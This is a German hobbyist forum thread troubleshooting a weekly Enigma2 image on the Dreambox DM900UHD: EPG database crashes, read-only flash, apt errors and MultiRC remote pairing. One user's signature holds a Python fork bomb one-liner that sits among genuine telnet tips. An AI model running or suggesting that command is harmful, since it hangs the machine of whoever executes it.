Angepinnt OE2.5: Rückmeldungen zum weekly Image für DM900UHD

• per telnet:

Quellcode

1. journalctl -f -u enigma2 >> /tmp/enigma2.log
      und dann mal die Box in IdleMode schicken
      Probleme kann man niemals mit derselben Denkweise lösen.

¯\_(ツ)_/¯

"Die Deutsche Rechtschreibung ist Freeware, sprich, du kannst sie kostenlos nutzen.
      Allerdings ist sie nicht Open Source, d.h. du darfst sie nicht verändern oder in veränderter Form veröffentlichen."
    • epg.db kaputt ?

• per telnet: systemctl stop enigma2
      • dann in /etc/enigma2 die epg.db löschen.
      • systemctl start enigma2

¯\_(ツ)_/¯

"Die Deutsche Rechtschreibung ist Freeware, sprich, du kannst sie kostenlos nutzen.
      Allerdings ist sie nicht Open Source, d.h. du darfst sie nicht verändern oder in veränderter Form veröffentlichen."
    • Hallo an das N2 team
      habe die DM 900UHD und die DM 7080HD wie kann mann mit der Fernbedienung RC10 bei box so machen das beide nicht aus gehen und angehen die Fernbedienung hat im batterie fach ein schalter 1 u 2 wie müss ich beide boxen getrennt einstellen wie muss mann das genau machen es geht nicht rictig beide Boxen gehen an oder aus .weis leider nicht mehr weiter. brauche mal hilfe so das es geht das dreambox 1 = 7080HD aus ist,u dreambox-2 900UHD an geht.bei verbindungen per signal programieren od einstellen.
    • Plugin "MultiRc" (enigma2-plugin-extensions-multirc ) auf beiden Boxen installieren.
      Beschreibung z.B. hier.
      Yamp - Musicplayer mit Artist-Art-Hintergrund und "Karaoke Light"- aktuelle Version V3.3.2 hier, bitte beachten: FAQ hier

Wissen ist eins der wenigen Güter, das sich durch Teilen vermehren lässt .... :thumbsup:
    • habe bei beide boxen das Plugin multirc instaliert auf DM 7080HD und die neue Dm 900UHD und was muss ich auswählen im plugin das die beide boxen getrennt an gehen und ausgehen.weil es jetzt nur beide angehen und ausgehen .möchte das so machen
      Fernbedienung R10
      1. dreambox 7080HD bleibt aus
      2 dreambox 900UHD muss an bleiben
      punkt 3 beide boxen dürfen nicht angehen.das meine ich brauche mal hilfe n2 team.weis nicht mehr weiter weil im plugin noch von der dm 8000hd drinnen sind.
      danke für die antworten brauche schnelle hilfe eilt.
    • mdream34 schrieb:

habe bei beide boxen das Plugin multirc instaliert auf DM 7080HD und die neue Dm 900UHD und was muss ich auswählen im plugin das die beide boxen getrennt an gehen und ausgehen.weil es jetzt nur beide angehen und ausgehen .möchte das so machen
      Fernbedienung R10
      1. dreambox 7080HD bleibt aus
      2 dreambox 900UHD muss an bleiben
      punkt 3 beide boxen dürfen nicht angehen.das meine ich brauche mal hilfe n2 team.weis nicht mehr weiter weil im plugin noch von der dm 8000hd drinnen sind.
      danke für die antworten brauche schnelle hilfe eilt.
      Es ist sehr unhöflich in einem Forum schnelle antworten zu fordern denn die Leute hier haben auch ein Privatleben und sind Freiwillig hier.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Ich habe einen GS beim ausschalten der Box, Finde kein Crashlog, irgendwas mit EPG. Also wollte ich das Plugin epg-refresh deinstallieren. Geht aber nicht, folgende Meldung:
      E: Unable to write to var/cache/apt/
      E: The package lists or status file could not be parsed or opened

Update von heute ist drauf, irgendeine Idee?

EDIT: Wow, sehe gerade, dass ich gar kein Plugin deinstallieren kann. Bei allen die selbe Meldung (siehe oben E:...)

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von sackisch ()

• wenns beim ausschalten ist kann er wahrscheinlich die epg,db nicht schreiben.
      per telnet:
      systemctl stop enigma2
      dann in etc/enigma2/ die epg.db löschen
      systemctl start enigma2

wegen dem removen: apt-get autoremove enigma2-plugin-extensions-epgrefresh
      komplettte ausgabe posten

¯\_(ツ)_/¯

• apt-get autoremove enigma2-plugin-extensions-epgrefresh bringt die identische Ausgabe:

epg.db lässt sich nicht löschen. Enigma stoppt, geht aber trotzdem nicht
    • mhm flash kaputt ? wenn du selbst die epg.db nicht löschen kannst,
      haste box mal rebootet ?

¯\_(ツ)_/¯

• sackisch schrieb:

Ich habe das gleiche Problem, habe aber ein paar crashlogs von gestern und heute.

Mehrmalige reboots haben natürlich keine Abhilfe geschafft, die epg.db Datei ist auch ziemlich gross. 1.998.848

Da habe ich beim letzten Update was falsches gedrückt.
      Dateien
      Es gibt Tage, da verliert man eben, und
      es gibt Tage, da gewinnen die anderen!
    • @Matlock aus irgend einem grund ist dein filesystem read only gemountet worden poste die crashfiles im dmm forum

abhilfe schafft da nur neu flashen
      » time to say goodbye «

Konfuzius sagt:
      Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.
    • b_clinton schrieb:

deep

die Fehlermeldung bekomme ich auch

Anbei ein log
      gleiche problem wie Matlock oder sackisch flash wird readonly gemountet
      » time to say goodbye «

Konfuzius sagt:
      Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.
    • Matlock schrieb:

nixkoenner schrieb:

abhilfe schafft da nur neu flashen
      Das neu flashen heist dann auch alle Haken raus im rescue Modus?
      Damit hatte ich schon am Anfang ein paar Problemchen, wenn das erneut auftritt würde ich mich später noch mal dazu melden.
      ja würde ich versuchen und auf alle fälle die crashlogs an dmm schicken.
      » time to say goodbye «

Konfuzius sagt: